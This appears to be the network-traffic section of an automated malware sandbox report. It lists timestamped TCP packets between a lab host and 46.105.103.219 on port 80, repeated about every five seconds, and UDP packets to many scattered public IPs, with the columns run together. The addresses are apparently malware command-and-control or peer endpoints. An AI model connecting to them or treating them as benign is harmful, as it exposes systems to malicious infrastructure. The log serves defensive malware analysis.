                                                                                                          Nov 26, 2024 11:43:33.166158915 CET804983446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:35.273452997 CET804983446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:35.273607969 CET4983480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:35.421061993 CET4983480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:35.541119099 CET804983446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:38.102844954 CET4984680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:38.223965883 CET804984646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:38.227237940 CET4984680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:38.227262020 CET4984680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:38.349459887 CET804984646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:40.462949991 CET804984646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:40.463057041 CET4984680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:40.620573997 CET4984680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:40.740792990 CET804984646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:43.398418903 CET4985780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:43.518455982 CET804985746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:43.519156933 CET4985780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:43.519269943 CET4985780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:43.639293909 CET804985746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:45.714955091 CET804985746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:45.715240955 CET4985780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:45.772375107 CET4985780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:45.895739079 CET804985746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:48.377290010 CET4986880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:48.499614954 CET804986846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:48.499712944 CET4986880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:48.518910885 CET4986880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:48.640903950 CET804986846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:50.655318975 CET804986846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:50.655395985 CET4986880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:50.655441999 CET4986880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:50.775371075 CET804986846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:53.153322935 CET4988080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:53.273375988 CET804988046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:53.274676085 CET4988080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:53.275218010 CET4988080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:53.395091057 CET804988046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:55.458998919 CET804988046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:55.459152937 CET4988080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:55.459336996 CET4988080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:55.580089092 CET804988046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:57.963989973 CET4989180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:58.084708929 CET804989146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:58.084789038 CET4989180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:58.102690935 CET4989180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:58.226243019 CET804989146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:00.276232958 CET804989146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:00.276318073 CET4989180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:00.277666092 CET4989180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:00.400209904 CET804989146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:03.046514988 CET4990280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:03.167021036 CET804990246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:03.167128086 CET4990280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:03.167335987 CET4990280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:03.290211916 CET804990246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:05.354387999 CET804990246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:05.354825020 CET4990280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:05.383636951 CET4990280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:05.504755020 CET804990246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:08.748402119 CET4991480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:08.870527983 CET804991446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:08.870601892 CET4991480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:08.871280909 CET4991480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:08.992397070 CET804991446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:11.156250000 CET804991446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:11.156347990 CET4991480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:11.157887936 CET4991480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:11.279685020 CET804991446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:13.683331966 CET4992580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:13.803656101 CET804992546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:13.803805113 CET4992580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:13.804148912 CET4992580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:13.924328089 CET804992546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:16.040458918 CET804992546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:16.040513039 CET4992580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:16.052910089 CET4992580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:16.173188925 CET804992546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:18.561610937 CET4994080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:18.682298899 CET804994046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:18.682540894 CET4994080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:18.683655024 CET4994080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:18.803689003 CET804994046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:20.885876894 CET804994046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:20.885967970 CET4994080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:20.888334036 CET4994080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:21.010338068 CET804994046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:23.372865915 CET4995180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:23.572568893 CET804995146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:23.573060989 CET4995180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:23.593023062 CET4995180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:23.760361910 CET804995146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:25.775685072 CET804995146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:25.781544924 CET4995180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:25.790720940 CET4995180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:26.071147919 CET804995146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:28.304418087 CET4996280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:28.429246902 CET804996246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:28.429368019 CET4996280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:28.456795931 CET4996280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:28.576811075 CET804996246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:30.615174055 CET804996246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:30.615302086 CET4996280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:30.618113041 CET4996280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:30.739675045 CET804996246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:33.138494015 CET4997380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:33.258629084 CET804997346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:33.258841038 CET4997380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:33.262223005 CET4997380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:33.382406950 CET804997346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:35.444412947 CET804997346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:35.444529057 CET4997380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:35.444756985 CET4997380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:35.564769030 CET804997346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:38.022447109 CET4998480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:38.142450094 CET804998446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:38.142554045 CET4998480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:38.143026114 CET4998480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:38.264882088 CET804998446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:40.366668940 CET804998446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:40.366729975 CET4998480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:40.387213945 CET4998480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:40.507489920 CET804998446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:42.897377014 CET4999580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:43.020219088 CET804999546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:43.020564079 CET4999580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:43.021666050 CET4999580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:43.141835928 CET804999546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:45.243765116 CET804999546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:45.244055986 CET4999580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:45.246113062 CET4999580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:45.366096020 CET804999546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:47.850203037 CET5000680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:47.970427036 CET805000646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:47.971587896 CET5000680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:47.971929073 CET5000680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:48.092477083 CET805000646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:50.143956900 CET805000646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:50.147624969 CET5000680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:50.177299976 CET5000680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:50.300097942 CET805000646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:52.985527992 CET5001980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:53.107357025 CET805001946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:53.107414961 CET5001980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:53.108802080 CET5001980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:53.228714943 CET805001946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:55.298002958 CET805001946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:55.298067093 CET5001980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:55.417797089 CET5001980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:55.539216995 CET805001946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:58.213634968 CET5003280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:58.336297035 CET805003246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:58.337363958 CET5003280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:58.338093996 CET5003280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:58.461303949 CET805003246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:00.538028002 CET805003246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:00.538110018 CET5003280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:00.539834976 CET5003280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:00.660106897 CET805003246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:03.059140921 CET5004280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:03.179164886 CET805004246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:03.179230928 CET5004280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:03.180468082 CET5004280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:03.300518036 CET805004246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:05.399024963 CET805004246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:05.399094105 CET5004280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:05.399713993 CET5004280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:05.521240950 CET805004246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:07.981467962 CET5004380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:08.104340076 CET805004346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:08.104410887 CET5004380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:08.107234001 CET5004380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:08.227716923 CET805004346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:10.307544947 CET805004346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:10.307722092 CET5004380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:10.623198986 CET5004380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:10.744932890 CET805004346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:13.127006054 CET5004480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:13.247262955 CET805004446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:13.250031948 CET5004480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:13.254440069 CET5004480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:13.374955893 CET805004446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:15.406095028 CET805004446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:15.407489061 CET5004480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:15.512243986 CET5004480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:15.635859013 CET805004446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:18.390045881 CET5004580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:18.510344028 CET805004546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:18.510415077 CET5004580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:18.511661053 CET5004580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:18.631705999 CET805004546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:20.712851048 CET805004546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:20.712933064 CET5004580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:20.723155022 CET5004580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:20.845310926 CET805004546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:23.266529083 CET5004680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:23.391247988 CET805004646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:23.391324043 CET5004680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:23.393356085 CET5004680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:23.513340950 CET805004646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:25.591669083 CET805004646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:25.593888998 CET5004680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:25.793240070 CET5004680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:25.915007114 CET805004646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:28.385730028 CET5004780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:28.507810116 CET805004746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:28.507936001 CET5004780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:28.527074099 CET5004780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:28.647128105 CET805004746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:30.698436022 CET805004746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:30.698513985 CET5004780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:30.701896906 CET5004780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:30.825187922 CET805004746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:33.380412102 CET5004880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:33.500719070 CET805004846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:33.500796080 CET5004880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:33.549978971 CET5004880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:33.671792030 CET805004846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:35.698180914 CET805004846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:35.698391914 CET5004880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:36.028361082 CET5004880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:36.148888111 CET805004846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:38.804801941 CET5004980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:38.926198959 CET805004946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:38.926379919 CET5004980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:38.932332039 CET5004980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:39.052520037 CET805004946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:41.155170918 CET805004946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:41.155369043 CET5004980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:41.159869909 CET5004980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:41.279974937 CET805004946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:43.907198906 CET5005080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:44.029839039 CET805005046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:44.029983044 CET5005080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:44.030368090 CET5005080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:44.153091908 CET805005046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:46.228156090 CET805005046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:46.228245020 CET5005080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:46.231093884 CET5005080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:46.351998091 CET805005046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:48.730793953 CET5005180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:48.850924015 CET805005146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:48.851980925 CET5005180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:48.852309942 CET5005180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:48.973153114 CET805005146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:51.089796066 CET805005146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:51.090228081 CET5005180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:51.133399010 CET5005180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:51.253475904 CET805005146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:53.749113083 CET5005280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:53.872267962 CET805005246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:53.872486115 CET5005280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:53.888876915 CET5005280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:54.009006023 CET805005246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:56.062082052 CET805005246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:56.062305927 CET5005280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:56.091145039 CET5005280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:56.211182117 CET805005246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:58.600526094 CET5005380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:58.721220970 CET805005346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:45:58.721451044 CET5005380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:58.724412918 CET5005380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:45:58.844496965 CET805005346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:46:00.949337006 CET805005346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:46:00.949414015 CET5005380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:46:00.949927092 CET5005380192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:46:01.070097923 CET805005346.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:46:03.522681952 CET5005480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:46:03.642894030 CET805005446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:46:03.642971992 CET5005480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:46:03.644506931 CET5005480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:46:03.766263962 CET805005446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:46:05.871540070 CET805005446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:46:05.871611118 CET5005480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:46:05.887906075 CET5005480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:46:06.016091108 CET805005446.105.103.219192.168.2.4
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 26, 2024 11:42:03.490159035 CET532311473192.168.2.494.76.206.19
                                                                                                          Nov 26, 2024 11:42:04.009288073 CET532327046192.168.2.489.122.185.62
                                                                                                          Nov 26, 2024 11:42:04.537038088 CET532335164192.168.2.4188.241.130.50
                                                                                                          Nov 26, 2024 11:42:05.552653074 CET532347620192.168.2.4186.211.10.235
                                                                                                          Nov 26, 2024 11:42:05.869291067 CET532357368192.168.2.4179.184.169.171
                                                                                                          Nov 26, 2024 11:42:06.405683041 CET532364138192.168.2.484.108.73.183
                                                                                                          Nov 26, 2024 11:42:06.938277006 CET532375812192.168.2.4188.240.66.34
                                                                                                          Nov 26, 2024 11:42:07.456372976 CET492934980192.168.2.4190.73.34.36
                                                                                                          Nov 26, 2024 11:42:18.744560957 CET573234310192.168.2.493.114.144.199
                                                                                                          Nov 26, 2024 11:42:19.376208067 CET573246900192.168.2.4122.168.100.182
                                                                                                          Nov 26, 2024 11:42:19.901957989 CET578744700192.168.2.498.126.7.202
                                                                                                          Nov 26, 2024 11:42:20.685527086 CET578754800192.168.2.4202.56.221.5
                                                                                                          Nov 26, 2024 11:42:21.197283030 CET578767451192.168.2.4188.241.239.210
                                                                                                          Nov 26, 2024 11:42:21.746364117 CET578776870192.168.2.4187.6.136.20
                                                                                                          Nov 26, 2024 11:42:22.262135983 CET521647866192.168.2.4113.161.12.199
                                                                                                          Nov 26, 2024 11:42:22.783629894 CET521655060192.168.2.4203.146.109.163
                                                                                                          Nov 26, 2024 11:42:33.776923895 CET612445350192.168.2.492.87.229.20
                                                                                                          Nov 26, 2024 11:42:34.578622103 CET612457036192.168.2.459.161.19.29
                                                                                                          Nov 26, 2024 11:42:35.103683949 CET612464717192.168.2.4190.207.236.217
                                                                                                          Nov 26, 2024 11:42:35.885510921 CET612476511192.168.2.4188.214.36.212
                                                                                                          Nov 26, 2024 11:42:36.404650927 CET612485140192.168.2.4180.151.8.178
                                                                                                          Nov 26, 2024 11:42:36.933377981 CET491908542192.168.2.4177.11.161.29
                                                                                                          Nov 26, 2024 11:42:37.454322100 CET491916822192.168.2.4202.43.114.170
                                                                                                          Nov 26, 2024 11:42:37.966048956 CET491927866192.168.2.4191.37.199.39
                                                                                                          Nov 26, 2024 11:42:48.856014967 CET596446787192.168.2.4181.44.61.173
                                                                                                          Nov 26, 2024 11:42:49.634411097 CET596456856192.168.2.4118.102.149.168
                                                                                                          Nov 26, 2024 11:42:50.177531004 CET596464664192.168.2.486.100.45.216
                                                                                                          Nov 26, 2024 11:42:50.962583065 CET556615616192.168.2.439.1.15.172
                                                                                                          Nov 26, 2024 11:42:51.482630014 CET556628030192.168.2.4220.130.154.247
                                                                                                          Nov 26, 2024 11:42:52.057308912 CET556636910192.168.2.4113.11.62.14
                                                                                                          Nov 26, 2024 11:42:52.560622931 CET556646373192.168.2.4203.147.91.179
                                                                                                          Nov 26, 2024 11:42:53.089492083 CET556656912192.168.2.4115.78.135.71
                                                                                                          Nov 26, 2024 11:43:03.885157108 CET632684664192.168.2.431.211.133.88
                                                                                                          Nov 26, 2024 11:43:04.681849003 CET632697456192.168.2.489.37.188.218
                                                                                                          Nov 26, 2024 11:43:05.197613001 CET632706142192.168.2.441.38.34.12
                                                                                                          Nov 26, 2024 11:43:05.995588064 CET630177933192.168.2.4177.22.43.78
                                                                                                          Nov 26, 2024 11:43:06.511341095 CET630185372192.168.2.486.106.240.47
                                                                                                          Nov 26, 2024 11:43:07.291757107 CET630196172192.168.2.4150.165.220.74
                                                                                                          Nov 26, 2024 11:43:07.807024002 CET630206364192.168.2.486.104.74.51
                                                                                                          Nov 26, 2024 11:43:08.321988106 CET630216286192.168.2.427.106.75.127
                                                                                                          Nov 26, 2024 11:43:19.074901104 CET568646235192.168.2.4118.69.54.5
                                                                                                          Nov 26, 2024 11:43:19.876866102 CET568659674192.168.2.4190.206.225.183
                                                                                                          Nov 26, 2024 11:43:20.369282961 CET554779675192.168.2.490.179.53.86
                                                                                                          Nov 26, 2024 11:43:21.155097961 CET554787700192.168.2.4113.162.238.152
                                                                                                          Nov 26, 2024 11:43:21.665997028 CET554797143192.168.2.479.126.164.67
                                                                                                          Nov 26, 2024 11:43:22.640465021 CET554804343192.168.2.4202.134.163.88
                                                                                                          Nov 26, 2024 11:43:23.141774893 CET554815812192.168.2.427.48.201.2
                                                                                                          Nov 26, 2024 11:43:23.656116962 CET554826621192.168.2.4187.40.170.3
                                                                                                          Nov 26, 2024 11:43:34.104309082 CET575754993192.168.2.4202.40.190.14
